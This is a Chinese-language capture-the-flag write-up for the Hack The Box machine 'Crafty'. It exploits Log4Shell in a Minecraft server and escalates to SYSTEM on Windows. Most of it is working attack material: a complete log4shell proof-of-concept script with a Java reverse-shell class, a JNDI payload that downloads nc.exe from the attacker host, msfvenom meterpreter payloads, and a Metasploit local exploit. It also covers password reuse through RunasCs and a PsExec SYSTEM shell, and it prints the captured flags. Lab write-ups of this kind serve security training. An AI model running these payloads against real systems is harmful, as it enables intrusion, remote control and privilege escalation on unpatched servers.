目录
连接至HTB服务器并启动靶机
信息搜集
使用rustscan对靶机TCP端口进行开放扫描
使用nmap对靶机开放端口进行脚本、服务扫描
使用curl访问靶机80端口
使用浏览器访问主域名
使用curl访问靶机25565端口
通过Google搜索靶机25565端口托管服务漏洞
通过CNNVD搜索该漏洞编号
漏洞利用
EXP
下载Minecraft客户端
发现毫无反应,所以我们这里尝试使用rogue-jndi
USER_FLAG:98c838cb49d32fe9588fa6d9ddbc407e
自动提权
启动Metasploit
ROOT_FLAG:e3ceb690ce79a39f0987422b52b14c8b
手动提权
攻击机新建一个SMB服务器
使用JD-GUI反编译playercounter-1.0-SNAPSHOT.jar文件拿到了一串密码
尝试启动Win-RM失败
尝试通过上文密码获取Administrator用户的反弹shell
通过Administrator用户设置以系统权限运行psexec获取反弹shell
连接至HTB服务器并启动靶机
靶机IP:10.10.11.249
分配IP:10.10.16.8
信息搜集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.11.249 -r 1-65535 --ulimit 5000
使用nmap对靶机开放端口进行脚本、服务扫描
nmap -p 80,25565 -sCV 10.10.11.249
从扫描结果可见,靶机25565端口使用的是Minecraft 1.16.5服务
使用curl访问靶机80端口
curl -I http://10.10.11.249:80┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.249:80
HTTP/1.1 301 Moved Permanently
Content-Length: 140
Content-Type: text/html; charset=UTF-8
Location: http://crafty.htb
Server: Microsoft-IIS/10.0
Date: Sat, 23 Nov 2024 14:22:10 GMT
将靶机IP与该域名写入hosts文件中
echo '10.10.11.249 crafty.htb' >> /etc/hosts使用curl访问该域名
curl -I http://crafty.htb┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://crafty.htb
HTTP/1.1 200 OK
Content-Length: 1826
Content-Type: text/html
Last-Modified: Fri, 27 Oct 2023 21:56:54 GMT
Accept-Ranges: bytes
ETag: "f431cf7f209da1:0"
Server: Microsoft-IIS/10.0
Date: Sat, 23 Nov 2024 14:28:19 GMT
使用浏览器访问主域名
将该子域名与靶机IP写入hosts文件中
echo '10.10.11.249 play.crafty.htb' >> /etc/hosts使用curl访问该子域名
curl -I http://play.crafty.htb┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://play.crafty.htb
HTTP/1.1 301 Moved Permanently
Content-Length: 140
Content-Type: text/html; charset=UTF-8
Location: http://crafty.htb
Server: Microsoft-IIS/10.0
Date: Sat, 23 Nov 2024 14:36:30 GMT
发现又被重定位回了主域名。尝试对主域名进行路径FUZZ
ffuf -u http://crafty.htb/FUZZ -w ../dictionary/Common-dir.txt
使用curl访问靶机25565端口
curl http://crafty.htb:25565┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://crafty.htb:25565
curl: (1) Received HTTP/0.9 when not allowed
指定使用HTTP/0.9协议
curl http://crafty.htb:25565 --http0.9┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://crafty.htb:25565 --http0.9
��{"translate":"disconnect.genericReason","with":["Internal Exception: io.netty.handler.codec.DecoderException: java.lang.IndexOutOfBoundsException: Index: 69, Size: 1"]}
通过Google搜索靶机25565端口托管服务漏洞
通过CNNVD搜索该漏洞编号
漏洞利用
找到相关漏洞的文章,其中包含了连接该靶机服务的客户端以及EXP
点击跳转:Exploiting Minecraft Servers (Log4j)
EXP
#!/usr/bin/env python3import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandlerCUR_FOLDER = Path(__file__).parent.resolve()def generate_payload(userip: str, lport: int) -> None:program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;public class Exploit {public Exploit() throws Exception {String host="%s";int port=%d;String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();}
}
""" % (userip, lport)# writing the exploit to Exploit.java filep = Path("Exploit.java")try:p.write_text(program)subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac"), str(p)])except OSError as e:print(Fore.RED + f'[-] Something went wrong {e}')raise eelse:print(Fore.GREEN + '[+] Exploit java class created success')def payload(userip: str, webport: int, lport: int) -> None:generate_payload(userip, lport)print(Fore.GREEN + '[+] Setting up LDAP server\n')# create the LDAP server on new threadt1 = threading.Thread(target=ldap_server, args=(userip, webport))t1.start()# start the web serverprint(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)httpd.serve_forever()def check_java() -> bool:exit_code = subprocess.call([os.path.join(CUR_FOLDER, 'jdk1.8.0_20/bin/java'),'-version',], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)return exit_code == 0def ldap_server(userip: str, lport: int) -> None:sendme = "${jndi:ldap://%s:1389/a}" % (userip)print(Fore.GREEN + f"[+] Send me: {sendme}\n")url = "http://{}:{}/#Exploit".format(userip, lport)subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java"),"-cp",os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),"marshalsec.jndi.LDAPRefServer",url,])def main() -> None:init(autoreset=True)print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")parser = argparse.ArgumentParser(description='log4shell PoC')parser.add_argument('--userip',metavar='userip',type=str,default='localhost',help='Enter IP for LDAPRefServer & Shell')parser.add_argument('--webport',metavar='webport',type=int,default='8000',help='listener port for HTTP port')parser.add_argument('--lport',metavar='lport',type=int,default='9001',help='Netcat Port')args = parser.parse_args()try:if not check_java():print(Fore.RED + '[-] Java is not installed inside the repository')raise SystemExit(1)payload(args.userip, args.webport, args.lport)except KeyboardInterrupt:print(Fore.RED + "user interrupted the program.")raise SystemExit(0)if __name__ == "__main__":main()直接将该PoC完整克隆到本地
git clone https://github.com/kozmer/log4j-shell-poc.git进入该PoC目录下
cd log4j-shell-poc-main安装PoC所需的依赖
pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple因为渗透的是Windows靶机,所以poc.py脚本中的cmd变量需要修改成:powershell.exe
使用-h选项查看该脚本所需填写的其他参数
python poc.py -h ┌──(root㉿kali)-[/home/kali/Desktop/temp/log4j-shell-poc-main]
└─# python poc.py -h[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-pocusage: poc.py [-h] [--userip userip] [--webport webport] [--lport lport]
log4shell PoC
options:
-h, --help show this help message and exit
--userip userip Enter IP for LDAPRefServer & Shell
--webport webport listener port for HTTP port
--lport lport Netcat Port
此处只需依葫芦画瓢地填充好脚本所需参数并执行
python poc.py --userip 10.10.16.8 --webport 8000 --lport 1425
这里提示我们缺少:jdk1.8.0_20,在该PoC的Github页面下方给出了资源链接
点击跳转:ORACLE官网
按住Ctrl+F搜索:8u20-
JDK包下载完成后将其进行解压
tar xf jdk-8u20-linux-x64.tar.gz移动到PoC目录下
mv jdk1.8.0_20 log4j-shell-poc-main┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
jdk-8u20-linux-x64.tar.gz log4j-shell-poc-main
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# tar xf jdk-8u20-linux-x64.tar.gz
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
jdk1.8.0_20 jdk-8u20-linux-x64.tar.gz log4j-shell-poc-main
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# mv jdk1.8.0_20 log4j-shell-poc-main
再次利用EXP
python poc.py --userip 10.10.16.8 --webport 8000 --lport 1425
下载Minecraft客户端
点击跳转:TLauncher
下载完成后使用java运行该jar文件
java -jar TLauncher.jar一直点击下一步安装后进入版本安装页
配置好账户名、版本后,点击设置
进入游戏后点击多人游戏
点击添加服务器选项后,在服务器地址处填入:play.crafty.htb
进入游戏后点击按键"T"唤出交流框,并填入Payload
发现毫无反应,所以我们这里尝试使用rogue-jndi
先将该工具进行下载
git clone https://github.com/veracode-research/rogue-jndi.git对其进行构建
mvn package直接利用该工具生成Payload
java -jar target/RogueJndi-1.1.jar --command "powershell.exe iwr http://10.10.16.8:6666/nc.exe -O c:\windows\temp\nc.exe;c:\windows\temp\nc.exe 10.10.16.8 1425 -e powershell.exe" --hostname "10.10.16.8"
完整Payload
${jndi:ldap://10.10.16.8:1389/o=reference}开启http服务以便靶机读取nc.exe
php -S 0:6666本地侧开始监听
rlwrap -cAr nc -lvnp 1425重复在聊天框中发送Payload的步骤后本地侧nc收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.249] 49689
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.PS C:\users\svc_minecraft\server> whoami
whoami
crafty\svc_minecraft
查找user_flag并查看其位置
gci -r c:\users\ user.txt -ea 0gc "C:\users\svc_minecraft\Desktop\user.txt"PS C:\users\svc_minecraft\server> gci -r c:\users\ user.txt -ea 0
gci -r c:\users\ user.txt -ea 0
Directory: C:\users\svc_minecraft\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/23/2024 5:45 AM 34 user.txt
PS C:\users\svc_minecraft\server> gc "C:\users\svc_minecraft\Desktop\user.txt"
gc "C:\users\svc_minecraft\Desktop\user.txt"
98c838cb49d32fe9588fa6d9ddbc407e
USER_FLAG:98c838cb49d32fe9588fa6d9ddbc407e
自动提权
查看靶机系统信息
systeminfoPS C:\users\svc_minecraft\server> systeminfo
systeminfoHost Name: CRAFTY
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA944
Original Install Date: 4/10/2020, 9:48:06 AM
System Boot Time: 11/23/2024, 5:44:20 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.23553139.B64.2403260936, 3/26/2024
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,697 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,520 MB
Virtual Memory: In Use: 2,279 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CRAFTY
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.249
[02]: fe80::dae1:2bca:5335:e9f4
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
本地通过msfvenom生成一个64位的msf木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.8 LPORT=5555 -f exe -o shell.exe再次启动http服务
php -S 0:8888靶机将该木马进行下载(提前找一个有权限的目录)
iwr http://10.10.16.8:8888/shell.exe -O shell.exe启动Metasploit
msfconsole使用监听模块
use exploit/multi/handler配置好选项后开始监听:LHOST、LPORT、PAYLOAD
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.10.16.8:5555
[*] Meterpreter session 1 opened (10.10.16.8:5555 -> 10.10.11.249:49740) at 2024-11-24 08:05:55 -0500meterpreter >
将Meterpreter收回会话
background切换到提权扫描模块
use multi/recon/local_exploit_suggester配置好选项开始执行:SESSION
切换到提权模块
use windows/local/cve_2024_30088_authz_basep配置好选项开始执行:LHOST、LPORT、PAYLOAD、SESSION
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.16.8:1212
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 17763
[*] Reflectively injecting the DLL into 5744...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 1720
[+] Successfully retrieved winlogon pid: 544
[*] Meterpreter session 2 opened (10.10.16.8:1212 -> 10.10.11.249:49742) at 2024-11-24 08:11:47 -0500meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
查找root_flag并查看其内容
meterpreter > search -f root.txt
Found 1 result...
=================Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Administrator\Desktop\root.txt 34 2024-11-23 08:45:22 -0500meterpreter > shell
Process 4580 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
e3ceb690ce79a39f0987422b52b14c8b
ROOT_FLAG:e3ceb690ce79a39f0987422b52b14c8b
手动提权
在C:\Users\svc_minecraft\server目录及其下的\plugins目录找到两个jar文件
攻击机新建一个SMB服务器
impacket-smbserver temp . -smb2support -username temp -password temp靶机连接到该SMB服务器
net use \\10.10.16.8\temp /user:temp temp将两个文件分别上传至攻击机
copy ./server.jar \\10.10.16.8\temp\server.jarcopy plugins/playercounter-1.0-SNAPSHOT.jar \\10.10.16.8\temp\playercounter-1.0-SNAPSHOT.jar靶机关闭与攻击机SMB服务器的连接
net use \\10.10.16.8\temp /delete使用JD-GUI反编译playercounter-1.0-SNAPSHOT.jar文件拿到了一串密码
s67u84zKq8IXw查看靶机系统内的用户
net userPS C:\Users\svc_minecraft\server> net user
net userUser accounts for \\CRAFTY
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
jacob svc_minecraft WDAGUtilityAccount
The command completed successfully.
尝试启动Win-RM失败
enable-psremoting -forceset-wsmanquickconfig -forcePS C:\Users\svc_minecraft\server> enable-psremoting -force
enable-psremoting -force
enable-psremoting : Access is denied. To run this cmdlet, start Windows PowerShell with the "Run as administrator"
option.
At line:1 char:1
+ enable-psremoting -force
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Enable-PSRemoting], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.EnablePSRemotingCommand
PS C:\Users\svc_minecraft\server> set-wsmanquickconfig -force
set-wsmanquickconfig -force
set-wsmanquickconfig : Access is denied. You need to run this cmdlet from an elevated process.
At line:1 char:1
+ set-wsmanquickconfig -force
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Set-WSManQuickConfig], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.WSMan.Management.SetWSManQuickConfigCommand
攻击机再次开启http服务
php -S 0:8888靶机将runascs工具进行下载
iwr http://10.10.16.8:8888/RunasCs.exe -O RunasCs.exe本地侧nc开始监听
rlwrap -cAr nc -lvnp 1426尝试通过上文密码获取Administrator用户的反弹shell
.\runascs.exe administrator 's67u84zKq8IXw' powershell -r 10.10.16.8:1426 -t 0PS C:\Users\svc_minecraft\Desktop> .\runascs.exe administrator 's67u84zKq8IXw' powershell -r 10.10.16.8:1426 -t 0
.\runascs.exe administrator 's67u84zKq8IXw' powershell -r 10.10.16.8:1426 -t 0[+] Running in session 1 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: WinSta0\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5784 created in background.
本地侧nc收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1426
listening on [any] 1426 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.249] 49755
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.PS C:\Windows\system32> whoami
whoami
crafty\administrator
靶机从攻击机中将psexec、nc进行下载
iwr http://10.10.16.8:8888/PsExec64.exe -O PsExec64.exeiwr http://10.10.16.8:8888/nc.exe -O nc.exe本地侧nc开始监听
rlwrap -cAr nc -lvnp 1427通过Administrator用户设置以系统权限运行psexec获取反弹shell
.\PsExec64.exe -accepteula -i -s cmd.exe /c "C:\Users\svc_minecraft\Desktop\nc.exe 10.10.16.8 1427 -e powershell.exe"本地侧nc收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1427
listening on [any] 1427 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.249] 49761
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.PS C:\Windows\system32> whoami
whoami
nt authority\system
